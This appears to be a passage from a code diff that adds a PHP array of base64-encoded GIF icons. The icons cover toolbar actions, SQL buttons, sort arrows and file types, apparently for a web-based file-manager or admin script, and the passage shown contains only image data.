+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
